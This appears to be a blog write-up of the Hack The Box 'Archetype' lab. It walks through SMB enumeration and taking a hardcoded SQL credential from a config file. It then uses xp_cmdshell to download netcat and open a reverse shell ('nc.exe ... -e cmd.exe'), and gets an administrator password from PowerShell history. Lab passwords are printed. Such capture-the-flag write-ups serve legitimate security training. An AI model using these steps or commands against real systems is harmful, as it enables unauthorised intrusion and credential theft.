Archetype writeup hackthebox


Service Scan with nmap

The scan reviews multiple open ports and we can safely assume that the OS of the system is Windows Server 2019. Additionally, there is an SQL Server, smb service etc. All the findings are below for you to analyze.

# nmap -sV -sC -p- -T4 -oA archetype archetype.htb

Not shown: 65523 closed ports
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-09-23T23:07:52
|_Not valid after:  2051-09-23T23:07:52
|_ssl-date: 2021-09-24T12:32:06+00:00; +19m28s from scanner time.
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h43m29s, deviation: 3h07m50s, median: 19m28s
| ms-sql-info: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-09-24T05:31:57-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-24T12:32:00
|_  start_date: N/A

In-depth SMB Enumeration & Exploit

Using smbmap to map the smb shares and see their permissions. We have enumerated two read-only shares: backups and IPC.

# smbmap -u ' ' -p ' ' -H                            
[+] Guest session       IP:     Name: archetype.htb                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        backups                                                 READ ONLY
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Analysing backups reveals a config file with a hardcoded password for the sql service.

# smbclient //

smb: \> ls
  .                                   D        0  Mon Jan 20 07:20:57 2020
  ..                                  D        0  Mon Jan 20 07:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020
smb: \> get prod.dtsConfig 
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (1.5 KiloBytes/sec) (average 1.5 KiloBytes/sec)

Pass: M3g4c0rp123 User: ARCHETYPE/sql_svc

# impacket-mssqlclient -windows-auth ARCHETYPE/sql_svc:[email protected]  

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd

To create a reverse shell I am gonna upload netcat onto the machine:

  1. Python server within windows binaries:
└─# cd /usr/share/windows-resources/binaries 

└─# python3 -m http.server 8000
  1. Download netcat and save it as nc.exe within temp folder.
SQL> xp_cmdshell powershell "wget -UseBasicPrasing -OutFile %temp%/nc.exe"
  1. Setup netcat listener to catch the incomming connection:
# nc -nvlp 4444
  1. Execute nc.exe with cmd back to our listener:
SQL> xp_cmdshell powershell "%temp%\nc.exe 4444 -e cmd.exe"

Privilege Escalation

By default, the PowerShell in Windows 10 saves the last 4096 commands that are stored in a plain text file located in the profile of each user %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

And we got username and password: administrator : MEGACORP_4dm1n!!

C:\Users\sql_svc\AppData>type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!

Loging in as administrator: C$ working directory , -W to specify the workgroup and -U to specify the username.

# smbclient //$ -W=ARCHETYPE -U=administrator                                                             1 ⨯
Enter ARCHETYPE\administrator's password: 
Try "help" to get a list of possible commands.

smb: \> cd users\administrator\desktop
smb: \users\administrator\desktop\> get root.txt
getting file \users\administrator\desktop\root.txt of size 32 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \users\administrator\desktop\> 

And finally, here is a gentle gorilla for you.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: